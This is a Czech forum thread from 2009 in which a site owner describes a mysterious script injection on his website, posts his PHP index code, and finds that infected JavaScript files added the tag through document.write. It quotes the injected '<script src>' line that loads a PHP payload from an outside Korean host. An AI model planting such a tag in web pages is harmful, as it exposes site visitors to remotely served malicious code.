| Autor | Zpráva | ||
|---|---|---|---|
| AM_ Profil |
#1 · Zasláno: 21. 10. 2009, 12:16:46
Zdravím,
setkal jsem se se zřejmě velice dobře zamaskovaným webovým virem. Na jednom z mých webů se objevilo <script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ></script> mezi tagy </head> a <body>. Stránka se generuje poměrně složitým skriptem, index vypadá takto:
<?php
function __autoload ($class) {
if (file_exists('_php/'.$class.'.class.php'))
require_once '_php/'.$class.'.class.php';
elseif ($class != 'self') {
trigger_error("class not found $class", E_USER_ERROR);
}
}
session_start();
require_once "config.php";
require_once "_php/userfunc.php";
require_once "_php/page.module.php";
page::init();
page::loadmodule('xurl');
page::loadmodule('sql');
page::loadmodule('lang', '"'.@page::$params['lang'].'", "'.SERVER_ROOT.'/'.DEFAULT_LANGUAGE.'/'.@page::$params['pgid'].'"');
page::loadmodule('login');
page::loadmodule('validator');
echo page::load();
varlog('logs');
?>Záhada je ve zvýrazněné řádce: web jsem si spustil a krokoval v debuggeru, ale: když jsem si dal watch na výsledek metody page::load, která vrací celý HTML obsah, tento obsah se ve watch zobrazil správně, bez viru. Výsledná stránka po echu ale vir obsahuje. Nevím, jaké informace poskytnout více, pastovat sem celé zdrojové kódy asi nemá smysl; nesetkal jste se někdo s něčím podobným? Buď teď přehlížím nějakou pitomost, nebo je ten virus opravdu nějak důmyslně zabudovaný do stránky. (O infekci ve webserveru, což mě napadlo, se zřejmě nejedná, protože když jsem celý web stáhl z internetu na localhosta, tak se virus ve stránce zobrazí také) |
||
| AM_ Profil |
#2 · Zasláno: 21. 10. 2009, 12:29:44
Aha, omlouvám se za zbytečné téma, problém byl ten, že byly infikovány JS soubory a v nich se vir vkládal přes document.write; to mne zmátlo, myslel jsem, že změny v HTML provedené javascriptem se při zobrazení zdrojového kódu nezobrazí, u jiných metod než document.write to tak pokud vím funguje.
|
||
| Chamurappi Profil |
#3 · Zasláno: 21. 10. 2009, 12:37:58
Dovolil jsem si odemknout.
Reaguji na AM: „myslel jsem, že změny v HTML provedené javascriptem se při zobrazení zdrojového kódu nezobrazí“ Tak to je. Pokud si zobrazuješ skutečný zdrojový kód. Některé prohlížeče umožňují zobrazit kód vygenerovaný JavaScriptem, ale to výchozí zobrazení zdrojáku se, pokud vím, chová všude stejně. |
||
| AM_ Profil |
#4 · Zasláno: 21. 10. 2009, 12:46:44
Chamurappi:
Aha, díky. Já si skutečný zdrojový kód (tak, jak to dělám vždycky, pravým myšítkem ->zobrazit zdroj) zobrazil (v Opeře a IE, víc jsem nezkoumal), a tam se změna projevila, proto jsem usoudil, že to nedělá JS. //Teď už jsem z toho vážně jelen, virus jsem ze souborů smazal a nahrál zpět na web. Super, na webu virus není, ale v offline verzi, kde jsem ho vymazal, je stále. Bohužel teď nemám čas se v tom dál šťourat, ale mám pocit, že se tady děje něco mezi křemíkovým nebem a zemí. |
||
|
Časová prodleva: 15 let
|
|||
0